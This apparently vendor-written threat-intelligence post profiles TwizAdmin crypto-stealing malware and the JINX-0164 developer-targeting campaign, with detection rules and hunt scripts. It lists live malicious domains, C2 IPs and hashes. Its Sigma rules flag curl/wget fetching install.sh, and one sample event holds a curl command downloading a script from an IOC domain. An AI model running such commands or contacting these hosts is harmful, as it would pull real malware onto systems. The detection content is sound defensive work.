TwizAdmin MaaS & JINX-0164 Dev Targeting: Multi-Stage Crypto Theft & Regional C2 Surge Analysis

Security Arsenal Team
May 28, 2026

Threat Summary

Recent intelligence from AlienVault OTX reveals a coordinated surge in cyber activity targeting the cryptocurrency ecosystem and using regional infrastructure for command-and-control (C2) operations.

The reporting period highlights the emergence of TwizAdmin, a sophisticated Malware-as-a-Service (MaaS) operation by the DataBreachPlus threat actor. This modular platform combines cryptocurrency clippers, seed phrase stealers, infostealers, and ransomware (crpx0) into a single FastAPI-managed suite, distributed via logistics-themed (FedEx) lures targeting both Windows and macOS.

Simultaneously, a new threat actor, JINX-0164, has been identified conducting precision supply chain attacks against cryptocurrency development teams, using LinkedIn social engineering to deliver custom macOS malware (AUDIOFIX, MINIRAT) via trojanized npm packages and fraudulent domains.

Underpinning these campaigns is a massive expansion of malicious infrastructure in the Middle East. Over 1,350 C2 servers were mapped across 98 providers, with Saudi Arabia’s STC hosting 72.4% of the regional infrastructure, facilitating operations for groups like APT28, Energetic Bear, and ransomware operators (LockBit Black).

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin)

  • Malware Families: TwizAdmin (Java RAT), crpx0 (Ransomware).
  • Distribution Method: Malicious emails posing as FedEx notifications; links to domains like fanonlyatn.xyz delivering payloads.
  • Payload Behavior: Multi-stage attack starting with a clipboard hijacker targeting 8 cryptocurrency blockchains. Escalates to BIP-39 seed phrase theft and browser credential exfiltration. Includes a ransomware module (crpx0).
  • C2 Communication: FastAPI-based panel hosted on port 1337; requires license key activation.
  • Persistence: Likely via scheduled tasks or launch agents (implied by multi-platform support).

JINX-0164

  • Malware Families: AUDIOFIX (Python Infostealer), MINIRAT (Go Backdoor).
  • Distribution Method: LinkedIn phishing (recruiter persona) leading to supply chain compromise (trojanized npm packages). Use of typosquatting domains (teamicrosoft.com, live.ong).
  • Payload Behavior: Python-based AUDIOFIX functions as an infostealer and RAT. MINIRAT provides lightweight remote access. Focuses on hijacking CI/CD pipelines and stealing developer credentials.
  • Persistence: macOS specific (LaunchAgents), utilizing shell scripts (install.sh) for initial deployment.

IOC Analysis

The provided indicators span multiple categories essential for detection:

  • Network Infrastructure: A significant concentration of IPv4 addresses (e.g., 37.32.15.8, 197.51.170.131) linked to Middle Eastern hosting providers acting as C2 nodes. SOC teams should immediately block these IPs at perimeter firewalls and monitor for egress connections.
  • Typosquatting & Delivery Domains: Domains such as teamicrosoft.com and driver-updater.net are critical for phishing detection. DNS query logs should be tuned to detect these specific resolutions and similar high-entropy variations.
  • File Hashes: Multiple SHA256 hashes (e.g., 06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092) correspond to TwizAdmin and JINX payloads. These should be integrated into EDR solutions for immediate scanning and quarantine.
  • Operationalization: Utilize SIEM correlation rules to match the specific URLs (https://fanonlyatn.xyz/files/) and the C2 port 1337 mentioned in the TwizAdmin panel.
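
Exact watchlist matching catches only the typosquatting domains already known. The bullet above also asks for DNS logs to be tuned for "similar high-entropy variations"; the following Python script, added here as an example and not part of the original report, shows one way to do that. It takes the second-level label of each DNS query name and scores it against a short list of brand labels (microsoft, fedex, linkedin, github, npmjs, an assumption based on the lures described in this report) using two heuristics: a brand label embedded in a longer label (teamicrosoft) and a small Levenshtein edit distance (micros0ft). The sample query names are constructed for the example.

```python
"""Lookalike-domain scoring for DNS query logs.

Added example, not code from the report. The brand labels are an assumption
drawn from the lures the report describes, and the sample queries are
constructed rather than taken from real telemetry.
"""
from dataclasses import dataclass
from typing import List, Optional

# Second-level labels of the brands abused in the FedEx / LinkedIn / Microsoft lures (assumption)
BRAND_LABELS = ["microsoft", "fedex", "linkedin", "github", "npmjs"]

# Constructed sample DNS query names
SAMPLE_QUERIES = [
    "login.teamicrosoft.com",      # brand label embedded in a longer label
    "microsoft.com",               # the real brand domain, must not be flagged
    "micros0ft.com",               # homoglyph, one edit away from the brand
    "fedex-tracking-notice.xyz",   # brand label embedded with a hyphenated suffix
    "cdn.fedex.com",               # legitimate subdomain of the brand
    "example.com",                 # unrelated
]


@dataclass
class Finding:
    query: str
    label: str
    brand: str
    reason: str


def registrable_label(fqdn: str) -> str:
    """Second-level label, e.g. 'teamicrosoft' for 'login.teamicrosoft.com'.

    Naive split on dots; public-suffix handling (co.uk, com.sa) is out of scope.
    """
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) computed with a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def score_query(fqdn: str, brands: List[str] = BRAND_LABELS,
                max_distance: int = 2) -> Optional[Finding]:
    """Return a Finding when the query's second-level label looks like a brand."""
    label = registrable_label(fqdn)
    if label in brands:
        return None  # the genuine brand domain or one of its subdomains
    for brand in brands:
        if brand in label:
            return Finding(fqdn, label, brand, f"embeds brand label '{brand}'")
        distance = levenshtein(label, brand)
        if distance <= max_distance:
            return Finding(fqdn, label, brand, f"edit distance {distance} from '{brand}'")
    return None


def scan(queries: List[str]) -> List[Finding]:
    """Apply score_query to every query name and keep the hits."""
    return [f for f in (score_query(q) for q in queries) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_QUERIES):
        print(f"{finding.query:30} -> {finding.reason}")
```

Run against a day of DNS query logs, the output is a hunting lead rather than a verdict: a label that embeds "fedex" may be a legitimate partner site, so the findings belong in a review queue, and the known typosquatting domains from the report should still be matched exactly in the SIEM alongside this heuristic.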

Detection Engineering

```yaml
title: Potential TwizAdmin Java RAT C2 Activity
id: 8e4f1a20-b1e2-4c3d-9e5f-6a7b8c9d0e1f
description: Detects Java processes (TwizAdmin) establishing connections on non-standard port 1337, associated with the FastAPI C2 panel.
author: Security Arsenal
date: 2026/05/28
modified: 2026/05/28
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\java.exe'
        DestinationPort: 1337
        Initiated: 'true'
    condition: selection
falsepositives:
    - Legitimate Java applications running on port 1337 (rare)
level: high

---

title: Suspicious macOS Shell Script Download (JINX-0164)
id: f3b2c1d0-e9f8-4a7b-8c6d-5e4f3a2b1c0d
description: Detects curl or wget processes downloading shell scripts from suspicious paths often used in JINX-0164 initial access.
author: Security Arsenal
date: 2026/05/28
modified: 2026/05/28
tags:
    - attack.initial_access
    - attack.t1190
    - attack.t1566.001
logsource:
    category: process_creation
    product: macos
detection:
    selection_tools:
        Image|endswith:
            - '/curl'
            - '/wget'
    selection_payload:
        CommandLine|contains:
            - 'install.sh'
            - 'troubleshoot/mac'
    condition: all of selection*
falsepositives:
    - Legitimate developer tooling updates
level: medium

---

title: Typosquatting Domain Access - LinkedIn Phishing (JINX-0164)
id: a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d
description: Identifies DNS requests or process connections to known typosquatting domains used in JINX-0164 campaigns.
author: Security Arsenal
date: 2026/05/28
modified: 2026/05/28
tags:
    - attack.initial_access
    - attack.t1566.002
logsource:
    category: dns_query
    product: windows
detection:
    selection_domains:
        QueryName|contains:
            - 'teamicrosoft.com'
            - 'live.us.org'
            - 'driver-updater.net'
    condition: selection_domains
falsepositives:
    - None expected
level: critical
```


```kql
// Hunt for JINX-0164 and TwizAdmin Network Indicators
// Scope: DeviceNetworkEvents (Microsoft Defender advanced hunting)
let IOC_Domains = dynamic([
    "fanonlyatn.xyz",
    "driver-updater.net",
    "live.ong",
    "teamicrosoft.com",
    "login.teamicrosoft.com"
]);
let IOC_IPs = dynamic([
    "89.36.224.5",
    "37.32.15.8",
    "197.51.170.131"
]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
// has_any does term matching inside the URL; the IP column is compared exactly
| where RemoteUrl has_any (IOC_Domains) or RemoteIP in (IOC_IPs)
| extend ThreatIntel = "TwizAdmin_JINX0164"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort, ThreatIntel
| sort by Timestamp desc
```


```powershell
# IOC Hunt Script for TwizAdmin / JINX-0164 Indicators
# Checks for files matching the listed SHA256 hashes, hosts-file tampering, and suspicious scheduled tasks

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
)

$SuspiciousDomains = @(
    "fanonlyatn.xyz",
    "driver-updater.net",
    "teamicrosoft.com"
)

Write-Host "[+] Hunting for TwizAdmin / JINX-0164 File Hashes..." -ForegroundColor Cyan

# Hash every file under the common drop locations (-File skips directories, which Get-FileHash cannot hash)
$PathsToScan = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            try {
                $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                # -contains compares case-insensitively, so the upper-case Get-FileHash output matches the lower-case list
                if ($TargetHashes -contains $Hash) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (Hash: $Hash)" -ForegroundColor Red
                }
            } catch {
                # Ignore locked or inaccessible files
            }
        }
    }
}

Write-Host "[+] Checking Hosts File for Suspicious Domains..." -ForegroundColor Cyan
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    foreach ($Domain in $SuspiciousDomains) {
        # -SimpleMatch treats the domain literally; with -match the dots would match any character
        if (Select-String -Path $HostsPath -Pattern $Domain -SimpleMatch -Quiet) {
            Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $Domain" -ForegroundColor Yellow
        }
    }
}

Write-Host "[+] Checking for Suspicious Scheduled Tasks (Generic Clipper/RAT patterns)..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object {
    # Parentheses make the grouping explicit (-and binds tighter than -or)
    ($_.TaskName -match "Update") -or
    ($_.TaskName -match "Driver") -or
    ($_.Actions.Execute -match "java") -or
    (($_.Actions.Execute -match "powershell") -and ($_.Actions.Arguments -match "-enc"))
} | ForEach-Object {
    # LastRunTime lives on the task-info object, not on the task itself
    $Info = $_ | Get-ScheduledTaskInfo
    [PSCustomObject]@{
        TaskName    = $_.TaskName
        State       = $_.State
        LastRunTime = $Info.LastRunTime
        Execute     = ($_.Actions.Execute -join "; ")
    }
} | Format-Table -AutoSize
```
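
To show how the three Sigma rules above and the watchlist from the IOC Analysis section behave against concrete telemetry, here is an added Python example (not code from the report or from any SIEM product). It re-implements each rule's logic with Sigma's case-insensitive endswith/contains semantics and runs it, together with the domain, IP and hash indicators, over a handful of constructed event records. Field names follow the Sigma logsource conventions used in the rules (Image, CommandLine, DestinationPort, Initiated, QueryName); the event records, their ids and the extra RemoteIP/RemoteUrl/SHA256 fields are made up for the example.

```python
"""Sigma-style rule evaluation and IOC watchlist matching over constructed events.

Added example, not code from the report or from any SIEM. The rule functions
mirror the three Sigma rules above; the event records are constructed.
"""
from typing import Callable, Dict, Iterable, List, Tuple

# Indicators quoted in the IOC Analysis section
IOC_DOMAINS = {"fanonlyatn.xyz", "driver-updater.net", "live.ong", "teamicrosoft.com"}
IOC_IPS = {"89.36.224.5", "37.32.15.8", "197.51.170.131"}
IOC_SHA256 = {"06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092"}
C2_PORT = 1337

Event = Dict[str, object]


def _endswith_any(value: object, suffixes: Iterable[str]) -> bool:
    """Sigma '|endswith' semantics: case-insensitive suffix match."""
    text = str(value or "").lower()
    return any(text.endswith(s.lower()) for s in suffixes)


def _contains_any(value: object, needles: Iterable[str]) -> bool:
    """Sigma '|contains' semantics: case-insensitive substring match."""
    text = str(value or "").lower()
    return any(n.lower() in text for n in needles)


def rule_twizadmin_c2(ev: Event) -> bool:
    """First rule: outbound connection from java.exe to port 1337."""
    return (ev.get("category") == "network_connection"
            and _endswith_any(ev.get("Image"), ["\\java.exe"])
            and ev.get("DestinationPort") == C2_PORT
            and str(ev.get("Initiated")).lower() == "true")


def rule_macos_script_download(ev: Event) -> bool:
    """Second rule: curl/wget AND a command line naming install.sh or troubleshoot/mac."""
    return (ev.get("category") == "process_creation"
            and _endswith_any(ev.get("Image"), ["/curl", "/wget"])
            and _contains_any(ev.get("CommandLine"), ["install.sh", "troubleshoot/mac"]))


def rule_typosquat_dns(ev: Event) -> bool:
    """Third rule: DNS query for one of the listed typosquatting domains."""
    return (ev.get("category") == "dns_query"
            and _contains_any(ev.get("QueryName"),
                              ["teamicrosoft.com", "live.us.org", "driver-updater.net"]))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("Potential TwizAdmin Java RAT C2 Activity", rule_twizadmin_c2),
    ("Suspicious macOS Shell Script Download (JINX-0164)", rule_macos_script_download),
    ("Typosquatting Domain Access - LinkedIn Phishing (JINX-0164)", rule_typosquat_dns),
]


def ioc_hits(ev: Event) -> List[str]:
    """Watchlist match over the fields a SIEM correlation rule would inspect."""
    hits = []
    for field in ("RemoteUrl", "QueryName", "CommandLine"):
        if _contains_any(ev.get(field), IOC_DOMAINS):
            hits.append(f"domain in {field}")
    if ev.get("RemoteIP") in IOC_IPS:
        hits.append("C2 ip")
    if str(ev.get("SHA256", "")).lower() in IOC_SHA256:  # hashes compared case-insensitively
        hits.append("file hash")
    return hits


def evaluate(events: Iterable[Event]) -> List[Tuple[str, str]]:
    """Return (event id, alert title) pairs for every rule and IOC hit."""
    findings = []
    for ev in events:
        for title, rule in RULES:
            if rule(ev):
                findings.append((ev["id"], title))
        for hit in ioc_hits(ev):
            findings.append((ev["id"], f"IOC: {hit}"))
    return findings


# Constructed sample events (ids, hosts and command lines are made up)
SAMPLE_EVENTS: List[Event] = [
    {"id": "n1", "category": "network_connection", "Image": r"C:\Program Files\Java\bin\java.exe",
     "DestinationPort": 1337, "Initiated": "true", "RemoteIP": "37.32.15.8", "RemoteUrl": ""},
    {"id": "n2", "category": "network_connection", "Image": r"C:\Program Files\Java\bin\java.exe",
     "DestinationPort": 1337, "Initiated": "false", "RemoteIP": "10.0.0.5", "RemoteUrl": ""},  # inbound, not C2
    {"id": "p1", "category": "process_creation", "Image": "/usr/bin/curl",
     "CommandLine": "curl -fsSL https://driver-updater.net/troubleshoot/mac/install.sh -o /tmp/install.sh"},
    {"id": "p2", "category": "process_creation", "Image": "/usr/bin/curl",
     "CommandLine": "curl -sS https://example.com/README.md"},
    {"id": "d1", "category": "dns_query", "QueryName": "login.teamicrosoft.com"},
    {"id": "f1", "category": "file_event",
     "SHA256": "06299676B43749B8477C4BC977C09512957FC9B66FD5030C1874069632CE6092"},
]

if __name__ == "__main__":
    for event_id, title in evaluate(SAMPLE_EVENTS):
        print(f"{event_id}: {title}")
```

Two details worth checking when porting this into a real pipeline: the first rule's Initiated flag is what separates an outbound beacon from an inbound connection to a Java service (event n2 is deliberately not flagged), and the third Sigma rule lists live.us.org while the actor profile and the KQL query list live.ong, so the example mirrors each source as written rather than reconciling them.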

Response Priorities

  • Immediate:
    • Block all listed IOCs (IPs, Domains, URLs) at the perimeter and proxy level.
    • Scan endpoints for the specific SHA256 hashes associated with TwizAdmin and JINX-0164.
    • Isolate any devices with detected connections to port 1337 or the specific Middle Eastern C2 IP ranges.
  • 24 Hours:
    • Conduct credential audits for users who may have interacted with FedEx lures or LinkedIn recruitment messages.
    • Force-reset passwords for cryptocurrency wallets and development accounts (GitHub, npm) accessed from potentially compromised endpoints.
  • 1 Week:
    • Review and restrict GitHub Actions/CI/CD pipelines to prevent supply chain injection (JINX-0164 vector).
    • Implement DNS Sinkholing for the identified typosquatting domains.
    • Update awareness training to include specific examples of logistics-themed malware and LinkedIn social engineering.
